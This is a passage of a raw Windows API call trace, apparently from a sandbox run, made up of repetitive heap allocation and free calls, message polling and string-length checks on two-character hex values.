(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0269.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0269.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0269.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0269.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.713] lstrlenW (lpString="73") returned 2 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.714] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.714] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0269.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0269.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.716] lstrlenW (lpString="65") returned 2 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.716] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.716] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0269.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0269.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.719] lstrlenW (lpString="72") returned 2 [0269.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.721] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.721] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0269.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0269.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0269.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0269.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.723] lstrlenW (lpString="33") returned 2 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.724] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.724] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.725] lstrlenW (lpString="32") returned 2 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.726] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.726] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.727] lstrlenW (lpString="2E") returned 2 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0269.728] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.728] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0269.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0269.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0269.729] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, 